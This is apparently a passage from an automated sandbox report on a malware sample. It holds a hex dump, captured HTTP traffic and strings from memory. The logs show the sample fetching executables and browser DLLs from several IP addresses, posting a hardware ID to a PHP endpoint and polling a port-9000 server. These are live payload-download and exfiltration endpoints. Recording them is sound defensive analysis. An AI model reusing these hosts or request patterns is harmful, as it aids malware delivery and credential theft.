7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec
Source: global traffic HTTP traffic detected: GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /ping.php?substr=eight HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic DNS traffic detected: DNS query: download.iolo.net
Source: global traffic DNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com
Source: unknown HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 41 35 39 44 31 37 39 41 41 31 31 30 36 36 35 34 35 34 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"3DEA59D179AA1106654546------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"default10------HDGIJJDGCBKFIDHIEBKE--
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp, u5c4.0.exe, 00000001.00000002.2516601507.000000002A6B1000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2500095496.00000000043A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.203/tiktok.exe
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: http://185.172.128.203/tiktok.exe00
Source: u5c4.0.exe, 00000001.00000002.2516601507.000000002A6B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.203/tiktok.exek
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
Source: u5c4.0.exe, 00000001.00000002.2500065620.0000000004354000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllZ
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dllL
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.0000000004395000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll8
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp, u5c4.0.exe, 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
Source: u5c4.0.exe, 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpW
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpeb42eb8dbe78cdaae1ee01f89185a
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
Source: MSBuild.exe, 0000000E.00000002.2977711882.0000000002D23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002C71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.215.85.66:9000
Source: MSBuild.exe, 0000000E.00000002.2977711882.0000000002D23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002C71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 